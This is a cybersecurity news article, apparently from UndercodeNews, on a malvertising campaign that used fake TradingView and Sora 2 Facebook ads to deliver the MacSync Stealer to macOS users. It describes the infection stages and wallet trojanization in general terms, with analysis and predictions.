Listen to this Post
Introduction: The New Face of Cyber Threats
Cybercriminals are getting smarter, targeting users with deceptive ads that look legitimate but deliver malware instead. The latest malvertising campaign focuses on macOS, impersonating well-known trading and AI platforms to trick unsuspecting users into downloading malicious software. As social media advertising becomes a common delivery method, even experienced users can fall victim if they aren’t vigilant.
Fake Ads Targeting macOS Users
The current campaign revives a long-running strategy that previously targeted Windows and Android users. Threat actors are now distributing sponsored Facebook ads promoting fake apps like “Sora 2” and “TradingView Desktop.” These ads aim to lure users into downloading a macOS payload under the guise of trusted software.
Two Waves of Attack
Bitdefender researchers Andreea Olariu and Ionut Baltariu have tracked two related malvertising waves. The first impersonated TradingView Desktop and Premium products, targeting macOS users via Meta ads. Clicking the ad redirected users to a fraudulent site mimicking TradingView’s interface, complete with a “Download for macOS” button. Instead of a legitimate installer, a Base64-encoded terminal command executed a malicious script.
The Sora 2 Lure
A few days later, the campaign shifted focus to Sora 2, designed to attract content creators. This wave targeted both macOS and Windows users and directed victims to sorachatgpts[.]com. Despite cosmetic differences, both campaigns used identical templates, delivery methods, and hosting infrastructure, indicating coordination by the same threat actors.
How the Malware Works
The macOS payload operates in multiple stages:
Stage 1 – Loader Script: Downloads and runs a gunzip-encoded shell snippet to fetch the next payload.
Stage 2 – AppleScript Infostealer: Executes the MacSync Stealer, capable of collecting sensitive information from users’ devices.
The malware replaces legitimate crypto-wallet apps like Ledger Live and Trezor Suite with trojanized versions. Version 1.0.8 of MacSync Stealer aggressively harvests credentials, personal data, and crypto-related information, turning a simple download into a full-scale data exfiltration campaign.
The Broader Implications
This campaign highlights how malvertising has evolved into a preferred vector for cross-platform attacks. By embedding malicious installers into paid and “verified” social media ads, cybercriminals bypass traditional security warnings and exploit users’ trust in familiar brands.
What Undercode Say: Deep Analysis of the Campaign
The resurgence of this malvertising campaign underscores the increasing sophistication of cybercriminal operations. The use of familiar, trusted brands like TradingView leverages psychological manipulation, exploiting users’ reliance on recognized software platforms. Attackers are no longer content with basic credential theft; they are building layered, cross-platform malware architectures that include infostealers and crypto-draining functionalities.
This evolution signals a shift in threat actor strategies: instead of mass phishing emails, malvertising allows them to reach a wide audience with minimal friction. The combination of social engineering and technical sophistication makes campaigns like this harder to detect. For macOS users, often perceived as more secure than Windows counterparts, this is a wake-up call that no platform is immune.
The two-wave approach also demonstrates operational flexibility. By switching targets between macOS-only and cross-platform campaigns, attackers can maximize impact while avoiding early detection. The reuse of visual templates and infrastructure indicates a modular, repeatable methodology that allows quick pivoting to new lures, keeping security teams reactive rather than proactive.
Additionally, the integration of crypto-wallet trojans is particularly concerning. By replacing legitimate wallet applications, the malware not only steals credentials but also directly manipulates financial assets, bridging the gap between traditional cybercrime and financial exploitation. This hybrid approach increases both potential damage and the difficulty of mitigation.
The campaign also reflects the evolution of the threat landscape in the context of social media. As platforms like Meta become primary digital interaction points, threat actors exploit paid advertising mechanisms that appear legitimate, bypassing conventional detection methods. Users may perceive these ads as safe, increasing the likelihood of execution and subsequent infection.
Moreover, the Base64-encoded terminal command delivery is a clever exploitation of macOS’s trusted terminal interface. Users following instructions to execute these commands unknowingly activate a multi-stage malware pipeline, showing that the success of the campaign relies not just on software tricks but also on user behavior and trust.
The campaign’s persistence indicates ongoing adaptation. Despite Meta’s removal of some ads, the threat actors are likely to rebrand and continue distributing malware, demonstrating that countermeasures must include both technological defenses and user education. Security awareness is crucial, as even experienced users can fall for highly polished scams.
Overall, this operation exemplifies the convergence of social engineering, cross-platform malware, and financial exploitation. It challenges assumptions about platform security, highlighting the importance of vigilance, timely patching, and skepticism toward even seemingly legitimate downloads.
Fact Checker Results
✅ Malvertising confirmed on Meta platforms targeting macOS and Windows users.
❌ No legitimate TradingView or Sora 2 apps are affected; all downloads are malicious.
✅ MacSync Stealer 1.0.8 actively replaces crypto wallets and collects sensitive data.
Prediction: The Future of Cross-Platform Malvertising
Given the modular infrastructure and ongoing evolution of this campaign, similar attacks are likely to continue. Threat actors will continue refining social engineering tactics, targeting both macOS and Windows users, and integrating more sophisticated payloads, including financial malware. Expect new fake apps and AI-related lures to appear, exploiting trending technologies to bypass user suspicion and platform defenses.
🕵️📝✔️Let’s dive deep and fact‑check.
References:
Reported By: www.bitdefender.com
Extra Source Hub (Possible Sources for article):
https://www.twitter.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
Bing
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon
